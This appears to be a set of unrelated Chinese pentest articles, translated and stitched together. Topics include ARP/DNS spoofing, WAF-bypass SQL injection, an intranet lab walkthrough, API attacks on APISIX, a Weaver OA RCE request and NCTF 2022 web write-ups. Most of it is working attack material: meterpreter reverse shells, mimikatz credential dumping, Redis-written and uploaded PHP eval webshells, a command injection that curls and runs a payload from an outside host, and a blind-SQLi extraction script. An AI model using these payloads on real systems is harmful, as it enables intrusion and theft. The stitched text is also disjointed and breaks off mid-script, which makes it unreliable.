use ettercap to capture communication data on the attack host ettercap -Tq -i eth0 Step 2: Simulate a third-party FTP service Step 3: Users access third-party FTP services and authenticate Step 4: The attacker successfully captures the user's account password information Spoofing Extensions Here we add a few commonly used ARP spoofing methods and the use of ARP spoofing tools in Windows~ NetFuke Test environment Target host: 192.168.174.170 (Win 7) Attack host: 192.168.174.169 (Windows Server 2003) Gateway address: 192.168.174.2 Deception Process Step 1: Run NetFuke software on the attack host and sniff configuration (the network card here must recognize the IP address, otherwise ARP spoofing cannot be performed) Step 2: Configuring ARP spoofing Step 3: Plugin command parameter settings Step 4: Turn on ARP spoofing Attack Detection Introduction to XArp Tools XArp is a popular ARP firewall software abroad. It can help users establish a special detection system and use advanced technology to detect and deal with various ARP attacks on the network. For example, using ARP spoofing, an attacker can eavesdrop on all your network traffic, including emails and passwords. All of this has not been discovered at all. XArp performs active and passive methods to detect such attacks. Attack Detection Step 1: Turn on NetFuke to implement ARP spoofing attack Step 2: Then, the XARP side can see the alarm information and related record information PS: I personally feel that this tool is not that good~ Defense measures The defense methods of ARP fraud mainly start from the following two aspects: a. Block the propagation of forged data packets: This method mainly starts from the perspective of network devices such as switches or routers. Taking the switch as an example, it binds the switch's port, MAC address, and IP address to generate a DAI (Dynamic ARP Inspection) detection table. If the host of a certain port sends a data packet that does not match its entry in the DAI table, you can choose to disconnect the network or discard the data packet it sends. b. The victim does not accept fake data packets This method mainly starts from the user's perspective. First of all, it is certain not to access unfamiliar networks. Secondly, users can install an ARP firewall on the device. If they are technical personnel, they can choose to establish static ARP entries (suitable for network environments that do not change frequently and have a small number). Windonwde users use the command 'arp -s ip' address mac address to perform static binding DNS Attack Domain Name System DNS (Domain Name System), that is, the domain name resolution protocol. The domain name system maps the domain name and IP addresses to each other in the form of a distributed database. Simply put, DNS is used to resolve domain names. With DNS, we no longer need to remember the annoying IP addresses. Use relatively easy-to-remember domain names to access the server. Even if the server changes its IP address, we can still access the server through the domain name, which can make us more convenient to access the Internet. When we enter www.baidu.com into our browser, we will go through the following query process: The client queryes the local DNS server for www.baidu.com local DNS server to check the local database. Since there is no record of the baidu.com domain, it passes the query information to the root domain DNS server and requests the resolution host name. The root domain DNS server returns the IP address of the DNS server responsible for resolving the 'com' domain to the local DNS server. The local DNS server sends the request to the DNS server responsible for the 'com' domain server responsible for the 'com' domain server. According to the request, the IP address of the DNS server responsible for the 'baidu.com' domain will be returned to the local DNS server responsible for the 'baidu.com' domain. The local DNS server sends a request to the DNS server responsible for the 'baidu.com' domain. Since this server has a record of www.baidu.com, it will www.baidu.com. The IP address is returned to the local DNS server. The local DNS server sends the IP address of www.baidu.com to the client. After the domain name is resolved successfully, the client sends the http request to the web server. The web server responds to the client's access request. The client can access the target host. DNS spoofing DNS plays such an important role in the Internet, but when designing the DNS protocol, the designer did not consider some security issues, which led to the security risks and defects of DNS. DNS spoofing is a very serious security defect when designing the DNS protocol. First, the spoofer sends a constructed ARP reply packet to the target machine. After the ARP spoofing is successful, it sniffs the DNS request packet sent by the other party, analyzes the packet to obtain the ID and port number, and sends a DNS return packet constructed by the target. After receiving the DNS reply packet, it finds that the ID and port number are all correct, that is, the domain name and corresponding IP address in the return packet are saved into the DNS cache table, and the real DNS reply packet will be discarded when the later real DNS reply packet is returned. Deception Practice Test environment Attack host: 192.168.174.129 Target host: 192.168.174.170 Simple Test Step 1: Test the network connectivity of the attack host Step 2: Then start the Apache service on the attacker's host and construct a phishing page. This is simplified into a normal HTML page. The local test effect is as follows Step 3: Find the etter.dns file, modify the configuration file, point www.al1ex.com to the local IP address locate etter.dns leafpad /etc/ettercap/etter.dns Step 4: Start spoofing with ettercap ettercap -G Then enable DNS spoofing

Some friends often encounter problems with SQL injection in the group. Sometimes there is waf, sometimes it is blind, and sometimes it doesn’t know how to start? Today I share a tool with the name of the Super Injection Tool Download address: https://github.com/shack2/SuperSQLInjectionV1 Case 1: Blind note with waf As shown in the figure below, single quotes report errors, and error echoes. This situation is a typical Boolean blind note. As long as we can construct a statement such as and 1=1 or or 1=1, data can be produced. Here is the mysql database, which is usually used to use if function to inject Boolean. Waf usually does not block a single if(), but will block if(1,1,1) such as if. If it is blocked, you can replace 1 with 11-10 and 2 with 12-10. Then, just use a shuttle for the Super Injection Tool. Bypassing the waf rule is the following, it is relatively simple Case 2: The and constructed in Case 1 is to identify the content returned by the page for the super injection tool, and to determine the correct page field of 1=1 and the field of the wrong page of 1=2. Normal tools cannot recognize the injection point, so you need to specify the field and give the tool a basis for boolean injection! Let's take a look at another example, I hope you can understand what I mean, The following figure is still mysql, successfully constructing an if The message is pasted into the super injection tool. This tool will only test 1=1 and 1=2 when testing blind betting. Therefore, set payload at the first position of if, look at the box in the lower right corner, and the echo value of the correct page has been identified. Then, the data will come out! Case 3: Here is a mssql type, That is, Sql-server. The site has waf. Test oR 1=1 and 1=2 without intercepting. Use 1=1 to construct the data packet. The SQL injection tool can recognize the Boolean value. Then there is no brainstorm for data. Original connection: https://mp.weixin.qq.com/s/jrv1ZLjZ3IbtloRCXWDo-Q

Network Configuration External network WIN7: ip1: 192.168.127.91/255.255.255.0, gw:192.168.127.2 (NAT mode) ip2:10.0.20.98-vmnet1 (host mode only) Domain host member: 10.0.20.99-vmnet1 (host mode only) 10.0.10.111-vmnet2 (host mode only) Domain control: 10.0.10.110-vmnet2 (host mode only) Password configuration: Win7: win7/adminwin2016: Administrator/Admin@123, vulntarget.com\win2016 Admin#123win2019: vulntarget.com\administrator Admin@666 Information Collection Scan the host arp-scan -l Scan the surviving host in the same network segment Discover a surviving host :192.168.127.91 Scan the port to scan the IP address of the surviving target machine nmap -sC -T4 192.168.127.91 Found that the target system is win7, and the 445 port is open. Try to use Eternal Blue (ms17-010) to hit the target system Intranet host penetration Enter the command in kali: msfconsolemsf 6 search 17-010msf 6 use 0msf 6 set payload windows/x64/meterpreter/reverse_tcpmsf 6 set lport 6666msf 6 set lhost 192.168.127.129msf 6 set rhosts 192.168.127.91msf 6 run meterpretershellC:\Windows\System32ipconfig I found some garbled code, so I just set C:\Windows\System32CHCP 65001 #65001 UTF-8 code page C:\Windows\System32ipconfig #I found two network segments, one is the 192.168.127 network segment, and the other is the 10.0.20 network segment C:\Windows\System32whomai # Check the current user's permissions as system permissions C:\Windows\System32tasklist/svc #View the process and found that there is no Killer in the system C:\Windows\System32exit #Exit shell command terminal meterpreterload kiwi #Load mimikataz module meterpretercreds_all #Get the login credentials for all current users, find that the user name is win7 and the password is: admin Web penetration Direct access, http://192.168.127.91/, found that it is Tongda OA View the version number of Tongda OA. The current version is 11.3http://192.168.127.91/inc/expired.php Search for Tongda 11.3 Existing file contains vulnerabilities through search engines: https://blog.csdn.net/hackzkaq/article/details/115900500 Use one-click graphical tool to obtain webshell Connect successfully using ant sword Also, the permission to view the current user under the command terminal of the Ant Sword is system permission Handalone penetration When a process is migrated and obtained a shell, the shell is extremely fragile, so it is necessary to move the shell to bind it to a stable process in the target machine without any write operations to the disk, which makes penetration more difficult to detect. After the automatic migration process command (run post/windows/manage/migrate), the system will automatically find the appropriate process and then migrate meterpreter run post/windows/manage/migrate #Migrate from spoolsv.exe of 1080 to the 4800 process of noepad.exe View the local network connection sub-segment meterpreter run get_local_subnets Add a dynamic route meterpreter run autoroute -s 10.0.20.0/24 or meterpreter backgroundmeterpreter sessionsmsf6 exploit(windows/smb/ms17_010_eternalblue) use post/multi/manage/autoroutemsf6 exploit(windows/smb/ms17_010_eternalblue) set session 1msf6 exploit(windows/smb/ms17_010_eternalblue) run meterpreter background Discover the surviving host msf6 exploit(windows/smb/ms17_010_eternalblue) use post/windows/gather/arp_scannermsf6 exploit(windows/smb/ms17_010_eternalblue) set session 1msf6 exploit(windows/smb/ms17_010_eternalblue) set rhosts 10.0.20.1-254msf6 exploit(windows/smb/ms17_010_eternalblue) run Another surviving host was found 10.0.20.99 to enable socks5 proxy msf6 exploit(windows/smb/ms17_010_eternalblue) use auxiliary/server/socks_proxymsf6 auxiliary(server/socks_proxy) run Port scanning first, you need to modify the /etc/proxychain4.conf configuration file vim /etc/proxychains4.confsocks5 127.0.0.1 1080 Scan the commonly used ports of the target IP through nmap proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080 Found that the 10.0.20.99 host is open to ports 6379 and 80. Here is a local socks5 proxy client service proxifier software scanned through dirsearch and found that the target has a phpinfo.php sensitive information page python3 dirsearch.py -l url.txt -t 10 -e * -i 200,302 --format csv -o C:\Users\backlion\Desktop\dirsearch-master\xxx.com.csv or execute proxychains under attack machine kali python dirsearch.py -u http://10.0.20.99 -i 200proxychains dirsearch -u "http://10.0.20.99" --proxy=socks5://127.0.0.1:1080 -t 5 Visit the phpinfo.php page to find that the absolute path of the website was exposed: C:/phpStudy/PHPTutorial/WWW/http://10.0.20.99/phpinfo.php http://10.0.20.99/l.php Redis Unauthorized Access Remote connection without password through redis-cli command proxychains redis-cli -h 10.0.20.99 Redis writes to webshell 10.0.20.99:6379 CONFIG set dir 'C:/phpStudy/PHPTutorial/WWW/' #Switch to the absolute path that can be written to the shell 10.0.20.99:6379 set x '\n\n\n?php @eval($_POST['x']);\n\n\n' #Write a sentence Trojan 10.0.20.99:6379 config set dbfilename shell.php #Set the file name as shell.php10.0.20.99:6379 save Here is a proxy through the ant sword on the local host, and connect to webshell View the current user permission is system Upload MSF backdoor Generate forward shellcodemsfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe shell.exe Use ant sword to upload shell.exe to 10.0.20.99 and execute to configure the listener use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 3333set RHOST 10.0.20.99run Close the firewall netsh firewallsetopmodemode=disable Run shell.exe in the ant sword command terminal Collect the same network segment host meterpreter arp Scan the 10.0.10.110 network segment migration process run post/windows/manage/migrate

Necessity Front-end separation has become a major trend in the web. It can be effectively decoupled through Tomcat+Ngnix (there can also be a Node.js in the middle). In addition, the separation of front and back ends will lay a solid foundation for future large-scale distributed architectures, elastic computing architectures, microservice architectures, and multi-terminal services (multiple clients, such as browsers, in-vehicle terminals, Android, IOS, etc.). The API assumes the responsibility of front-end communication. Therefore, it is necessary to learn API security. The idea of this article is to summarize some common attack surfaces in APIs. The author is still learning this area. If there are any mistakes, I hope you can correct it. Common API technologies GraphQL GraphQL is a query language for APIs Usually there are the following characteristics: (1) The data packets are sent to the /graphql interface (2) It contains many newline characters\n {'query':'\n query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n .FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n .InputValue\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n .InputValue\r\n }\r\n type {\r\n .TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n .InputValue\r\n }\r\n interfaces {\r\n .TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n .TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { .TypeRef }\r\n defaultValue\r\n }\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n ','variables':null} SOAP-WSDL WSDL (Web Services Description Language, Web Service Description Language) is an XML Application. It defines the Web service description as a set of service access points through which clients can access services containing document information or process calls. The SOAP protocol is used, which generally sends XML format data, and then there will be WSDL files Common .asmx files in .net also have wsdl format xxx.asmx?wsdl We can use soapui to test this type of API WADL There is a very obvious wadl logo in the file You can also use the rest function of soapui for testing REST rest API is not as obvious as the previous ones, and it is also the most commonly used API technology nowadays REST is a set of architectural specifications, not protocols or standards. API developers can implement REST in various ways. When a client makes a request through the RESTful API, it passes the resource state statement to the requester or terminal. This information or expression is transmitted through HTTP in one of the following formats: JSON (Javascript object notation), HTML, XLT, Python, PHP, or plain text. JSON is the most commonly used programming language. Although its original English name means "JavaScript object notation", it is suitable for various languages and can be read by both human and machine. There are some things to note: headers and parameters are also important in the HTTP method of RESTful API HTTP requests, because they contain important identification information such as requested metadata, authorization, unified resource identifier (URI), cache, and cookies. There are request headers and response headers, each with its own HTTP connection information and status code. How to get endpoints For some security tests of APIs, we usually focus on the permission issues of APIs, security issues of API endpoints and infrastructure. To test the security issues of API endpoints, you must try to get as many API endpoints as possible swagger api-docs leak Swagger is a standardized and complete framework for generating, describing, calling, and visualizing RESTful-style web services Common fingerprints: # swagger 2 /swagger-ui.html /api-docs /v2/api-docs # swagger 3 /swagger-ui/index.html /api-docs /v2/api-docs /v3/api-docs . api-docs can reveal all endpoint information Here are two tools for testing The first one is swagger-editor https://github.com/swagger-api/swagger-editor After downloading, you can use it by opening index.html. You can choose to import or remotely load the URL. Supports api-docs in json and yaml formats. The second one is apikithttps://github.com/API-Security/APIKit Burp plugin graphql introspective query Get all endpoint information https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ {'query':'\n query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n .FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n .InputValue\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n .InputValue\r\n }\r\n type {\r\n .TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n .InputValue\r\n }\r\n interfaces {\r\n .TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n .TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { .TypeRef }\r\n defaultValue\r\n }\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n ','variables':null} We can use this to generate interface documents: https://github.com/2fd/graphdoc Need nodejs test.json is the json format data returned by the introspective query npm install -g @2fd/graphdoc graphdoc -s ./test.json -o ./doc/schema Then we open the generated /doc/index.html Just construct data packets according to his format Other In black box testing, a big problem is that the API endpoints are not fully found. We need to look for them from the corresponding application or from other aspects. (1) web Static resources such as js html can have some API endpoints burp plugin JS LinkFinder can be collected passively (2) App and other client applications (3) github (4) According to the rules fuzz Authorization Method Basic Auth Provide username and password of the user every time the API is requested Usually there is an Authorization header in the http packet Authorization: Basic base64(username:password) This is relatively low in safety and is rarely used now JWT jwt (json web token) is a token-based authentication and authorization mechanism Divided into three parts Header: describes the metadata of JWT, defining the algorithm for generating signatures and the type of token. Payload: is used to store data that needs to be passed Signature: The server uses the signature algorithm specified in the header (default is HMAC SHA256) to prevent JWT from being tampered with the calculation method Encryption algorithm (base64(header) + '.' + base64(payload), secret) Online test https://jwt.io/ Ordinary tokens require the corresponding relationship between the backend storage and the user, while JWT carries the corresponding relationship itself Other custom headers, cookies Other forms of tokens such as apikey or randomly generated Common safety issues and testing methods api Gateway API gateway is a service built between the client and microservice. We can handle some non-business functions logic in the API gateway, such as permission verification, monitoring, caching, request routing, etc. API gateway is like the facade of the entire microservice system, and is the only entrance to the system. With it, the client sends the request to the API gateway first, and then the API gateway forwards the request to the microservice instance based on the requested identification information. apisix Apache APISIX is a cloud-native API gateway under the Apache Software Foundation. It combines dynamic, real-time, and high-performance features, providing rich traffic management functions such as load balancing, dynamic upstream, grayscale release (canary release), service circuit breaker, identity authentication, observability, etc. We can use Apache APISIX to handle traditional north-south traffic, or east-west traffic between services. At the same time, it is also supported as a K8s Ingress Controller. Apisix previously exposed a command execution vulnerability CVE-2022-24112 (the current latest version is 3.0) Scope of impact: All versions between Apache APISIX 1.3 ~ 2.12.1 (excluding 2.12.1) Apache APISIX 2.10.0 ~ 2.10.4 All versions between LTS (excluding 2.10.4) build vulnerability environments git clone https://github.com/twseptian/cve-2022-24112 ##Get dockerfile cd cve-2022-24112/apisix-docker/example/## Enter the corresponding directory docker-compose -p docker-apisix up -d ##Start all apisix services utilization conditions based on docker The batch-requests plug-in is enabled by default. The user uses the Apache APISIX default configuration (enables the Admin API, uses the default Admin Key and does not have additional management ports assigned), and attackers can call the Admin API through the batch-requests plugin. Attack ideas 1. Use batch-requests plug-in vulnerability to bypass request header detection; 2. Register routes with the Admin API by forging the request header; 3. When registering a route, the parameters filter_func pass lua code, causing remote code execution vulnerability exp: https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py

A certain application has a background RCE. According to relevant information, we found a call to newInstance instantiation in the background audit process. Trace the source and find InterfaceRegisterCustomOperationCmd #excute The access path is /api/integration/workflowflow/getInterfaceRegisterCustomOperation getInterfaceRegisterCustomOperation calls execute, first judging the user, so here is a background vulnerability Because we need this taint function JavaCodeToObject, we must meet the conditions of if and control var18 and var20 Here var14 needs to be added The value of var14 is obtained from the request parameter method, because the POST method is specified before, so here method=add After entering if judgment, the value of var15 will be returned if it is empty, so the value of actionid is not empty. Combined with the above condition, method=addactionid=1 If the beginning of var18 is not weaver.interfaces.workflow.action.javacode.Action will enter the following judgment, causing an exception to be thrown, which cannot achieve the desired result. So here classname=weaver.interfaces.workflow.action.javacode.Action, combined with the above parameter method=addactionid=1classname=weaver.interfaces.workflow.action.javacode.Action The following var20 value is taken from the javacode parameter, combined with the above payload method=addactionid=1classname=weaver.interfaces.workflow.action.javacode.Actionjavacode= If var18 contains weaver.interfaces.workflow.action.javacode into the javacodetoobject call we want, so classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Action is used for connection. Otherwise, a loading exception will be reported. According to the above conditions, the var18 and var20 conditions have been met. The parameters of the constructed var20 are javacode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode; import java.io.IOException; public class test { static { try { Runtime.getRuntime().exec('calc.exe'); } catch (IOException e) { e.printStackTrace(); } } } Here the code executed by the command is placed in the static code block because the code in static will be automatically executed during instantiation, and the command execution will be achieved. It seems that the actual package is not successfully used. Looking back at the code, I found that a parameter was lost dtinfo_CustomParameterData POST /api/integration/workflowflow/getInterfaceRegisterCustomOperation HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.33 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: ecology_JSessionid=aaa8G6PRBnnBD82yi6Fky; JSESSIONID=aaa8G6PRBnnBD82yi6Fky; __randcode__=d2fa15e2-395e-4b3b-a004-82fc07c18695; loginidweaver=1; languageidweaver=7; loginuuids=1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 548 method=addactionid=1classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Testdtinfo_CustomParameterData=11javaCode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode; import java.io.IOException; public class Test { static { try { Runtime.getRuntime().exec('calc.exe'); } catch (IOException e) { e.printStackTrace(); } } } Reprinted from: https://xz.aliyun.com/t/11947

Pull Item First clone it from GitHub to the server. git clone https://github.com/ki9mu/ARL-plus-docker/ Modify the configuration file Because ARL has a blacklist in the configuration file, sometimes the project is GOV or EDU or the like cannot be scanned, so modifying the configuration file here can lift the restrictions. cd ARL-plus-docker/ vi config-docker.yaml just delete a few items in the blacklist here After modification: Add and modify Riskiq and fofa APIs The Oneforall module is added in the enhanced version, so it needs to be opened in the configuration file, because the default code in the clone is Flase, and you can replace the switch you want to turn on here with Ttue. vi oneforall-config/setting.py After modification: After modifying it to the configuration file, start docker. First add a volume, and then docker-compose up -d can be started directly. If it is very slow when pulling the image, you can change the docker source. docker volume create --name=arl_db docker-compose up -d When you see a row of done, it means that it is successful. At this time, you need to enter the container to modify the python code, because there is also a blacklist in the python script. First use docker ps to check the container ID, then enter this container for modification, and use vi for editing. docker ps #View container ID docker exec -it corresponding ID bash vi app/config.py before modification: Add fingerprint After successful installation, add a fingerprint to give your lighthouse a stronger fingerprint. Address: https://vps:5003/ Default account secret: admin\arlpass git clone https://github.com/loecho-sec/ARL-Finger-ADD cd ARL-Finger-ADD python ARL-Finger-ADD.py -O https://vps:5003/admin arlpassCOPY Installation successfully Log in with the default password, and then modify the default password in the upper right corner to use it happily.

1.calc Question address: http://116.205.139.166:8001/ Right click /source source code @app.route('/calc',methods=['GET']) def calc(): ip=request.remote_addr num=request.values.get('num') log='echo {0}{1}{2} ./tmp/log.txt'.format(time.strftime('%Y%m%d-%H%M%S',time.localtime()),ip,num) if waf(num): try: data=eval(num) os.system(log) except: pass return str(data) else: return 'waf!' flask errors can be reported to see the filtering rules of waf http://162.14.110.241:8050/calc?num[]= def waf(s): blacklist=['import','(',')','#','@','^','$',',',''?','`',' ','_','|';','','','{','}','','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__'] flag=True for no in blacklist: if no.lower() in s.lower(): flag=False print(no) break Return flag After trying it, I found that I can operate num, use %0a to separate different commands, and %09 instead of spaces Then note that the statement needs to be executed normally by eval(num), otherwise it will not jump to the os.system(log). The solution is to wrap the command in single quotes. /calc?num=%0a'curl'%09'gtwq54.dnslog.cn'%0a Because the backticks are not easy to bring out echoes, I simply use curl to download payload and go online with msf /calc?num=%0a'curl'%09'http://x.x.x.x:yyyy/testapp'%09'-o'%09'/tmp/testapp'%0a /calc?num=%0a'chmod'%09'777'%09'/tmp/testapp'%0a /calc?num=%0a'/tmp/testapp'%0a 2.ez_php Question address: http://81.70.155.160/ ayacms github address https://github.com/loadream/AyaCMS There are many vulnerabilities in issues, but you have to log in to the background/front desk The background admin.php tried the weak password but failed, and the front desk could not register. So I downloaded the source code directly for code auditing, and then watched it for most of the day Many places in the source code have defined('IN_AYA') or exit('Access Denied'); that is, it cannot be accessed directly, and it must be included or required through other php files that have defined IN_AYA constants. This way of thinking is converted to finding vulnerabilities contained in files I've been searching for a long time and found a place at /aya/admin.inc.php The get_cookie gets the cookie value with aya_ prefix, and decrypt can also find the source code of the corresponding encrypt function. AYA_KEY during encryption is the default value aaa After the file is included, the idea will be much broader, and then combine it with known vulnerabilities https://github.com/loadream/AyaCMS/issues/3 payload ?php function random($length=4,$chars='abcdefghijklmnopqrstuvwxyz'){ $hash=''; $max=strlen($chars)-1; for($i=0;$i$length;$i++){ $hash.=$chars[mt_rand(0,$max)]; } return $hash; } function kecrypt($txt,$key){ $key=md5($key); $len=strlen($txt); $ctr=0; $str=''; for($i=0;$i$len;$i++){ $ctr=$ctr==32?0:$ctr; $str.=$txt[$i]^$key[$ctr++]; } return $str; } function encrypt($txt,$key=''){ $key or $key='aaa'; $rnd=random(32); $len=strlen($txt); $ctr=0; $str=''; for($i=0;$i$len;$i++){ $ctr=$ctr==32?0:$ctr; $str.=$rnd[$ctr].($txt[$i]^$rnd[$ctr++]); } return str_replace('=','',base64_encode(kecrypt($str,$key))); } echo encrypt('./module/admin/fst_upload'); http package POST /aya/admin.inc.php HTTP/1.1 Host: 81.70.155.160 Content-Length: 244 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=---WebKitFormBoundarykhsd4wQ8UBmzCnD1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.62 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: aya_admin_lang=QWwPIAJ9EitZZEEoQWtYOFA0DCUAMFttV2ANPBUlRmFNKBRmFTEQG1ZxTDFaaVEyQyMWdA Connection: close -----WebKitFormBoundarykhsd4wQ8UBmzCnD1 Content-Disposition: form-data; name='upfile'; filename='xzxz123123123.php' Content-Type: application/octet-stream ?php eval($_REQUEST[1]);phpinfo(); -----WebKitFormBoundarykhsd4wQ8UBmzCnD1 3.ezbypass hint hint waf is modsecurity Title address: http://162.14.110.241:8099/sql.php http://121.37.11.207:8099/sql.php Found a reference article online https://blog.h3xstream.com/2021/10/bypassing-modsecurity-waf.html The rest is to use a script to directly follow its payload, because the question prompts Can you find my password? so just guess the content of the password column. import requests import time flag='' i=1 while True: min=32 max=127 While min max: time.sleep(0.08) mid=(min + max) //2 print(chr(mid)) payload='if(ascii 1.e(substring(1.e(select password from users.info),{},1)){},1,0)'.format(i, mid) url='http://162.14.110.241:8099/sql.php?id={}'.format(payload) res=requests.get(url) if 'letian' in res.text: min=mid + 1 else: max=mid flag +=chr(min) i +=1 print('found', flag) 4.ez_sql Question address: http://81.70.155.160:3000/https://nctf.h4ck.fun/static/upload/files/06b43b853452e30514edf6bd709b3f99.zip The title description gives the source code app.js import { Application, Router, helpers } from 'https://deno.land/x/oak/mod.ts'; import Flight from './db.js'; const app=new Application(); const router=new Router(); router.get('/', async(ctx)={ ctx.response.body='check your flight `/flight?id=`'; }); router.get('/flight', async(ctx)={ const id=helpers.getQuery(ctx, { mergeParams: true }); const info=await Flight.select({departure: 'departure', destination: 'destination'}).where(id).all(); ctx.response.body=info; }); app.use(router.routes()); app.use(router.allowedMethods()); app.listen({ port: 3000, hostname: '0.0.0.0' }); db.js import { DataTypes, Database, Model, SQLite3Connector} from 'https://deno.land/x/[email protected]/mod.ts'; const connector=new SQLite3Connector({ filepath: '/tmp/flight.db' }); const db=new Database(connector); class Flight extends Model { static table='flight'; static fields={ id: { primaryKey: true, autoIncrement: true }, department: DataTypes.STRING, destination: DataTypes.STRING, }; } class Flag extends Model { static table='flag'; static fields={ flag: DataTypes.STRING, }; } db.link([Flight, Flag]); await db.sync({ drop: true }); await Flight.create({ department: 'Paris', destination: 'Tokyo', }); await Flight.create({ department: 'Las Vegas', destination: 'Washington', }); await Flight.create({ department: 'London', destination: 'San Francisco', }); await Flag.create({ flag: Deno.env.get('flag'), }); export default Flight Almost exactly the same as Hack.lu 2022 foodAPI, the reference article is as follows https://blog.huli.tw/2022/10/31/hacklu-ctf-2022-writeup/ https://gist.github.com/parrot409/f7f5807478f50376057fba755865bd98 https://gist.github.com/terjanq/1926a1afb420bd98ac7b97031e377436 The only difference is that the original question id uses the restful API form, while this question is get passed on parameters, so you cannot copy it directly exp However, if you look at the principles analyzed in the article, you will know that the idea is to use parameters to splice SQL statements, so imitate the original payload and pass it in as another get query http://81.70.155.160:3000/flight?id=1?=a` and 0 union select flag,2 from flag; Attachment download: https://github.com/X1cT34m/NCTF2022 Reprinted original text: https://exp10it.cn/2022/12/nctf-2022-web-writeup/#calc

1. Introduction I built a vulnerable environment where Spring heapdump leaks shiro key and thus RCE. Github address: https://github.com/P4r4d1se/heapdump_shiro_vuln Vulnerability Exploit Conditions: There is a heapdump file leak in Spring Shiro environment and an exploitable chain. 2. Vulnerability Principle Many bigwigs have shared the principles and debugging analysis of Shiro-related vulnerabilities. I won't go into details here. I will mainly explain this vulnerability environment: (1) Spring actually has its own default security framework, called Spring Security, but some developments may be used to using Shiro, and replaced Spring Securiy with Shiro. This situation is not uncommon, for example, Ruoyi is Spring shiro. (2) When there is a key, even the latest version of Shiro still has vulnerabilities, and in many cases, the shiro key will be leaked due to development, deployment and other issues. (3) In the version with Shiro greater than 1.2.4, the key is changed to random generation without the manual intervention of the developer. This random generation is that the key will not change before restarting each time the web environment is started. It can be found in the JVM virtual machine memory. (4) Spring's heapdump file is exported from the JVM virtual machine memory. To sum up, this combination vulnerability has been created. 3. Vulnerability Demonstration After loading the vulnerable environment, you can see that Shiro version is 1.8.0: Access the /actuator/heapdump on port 8080 to get the heapdump file: There are two ways I often use to get the shiro key: (1) JDumpSpider: https://github.com/whwlsfb/JDumpSpider This widget can automatically crawl variable information in heapdump, which is more convenient. The disadvantage is that it may miss information that is not in the crawl list. Run :java directly -jar JDumpSpider.jar heapdump to automatically obtain variable information. Here you get ShiroKey (2) jvisualvm.exe: Java's own tool, the default path is: JDK directory/bin/jvisualvm.exe This tool needs to manually find the information you want, enter org.apache.shiro.web.mgt.CookieRememberMeManager in the filter, and the 16 bytes circled are the key Use a Python script to convert it into a base64-encoded Shiro key: use a Python script to convert it into a base64-encoded Shiro key: import base64 import struct 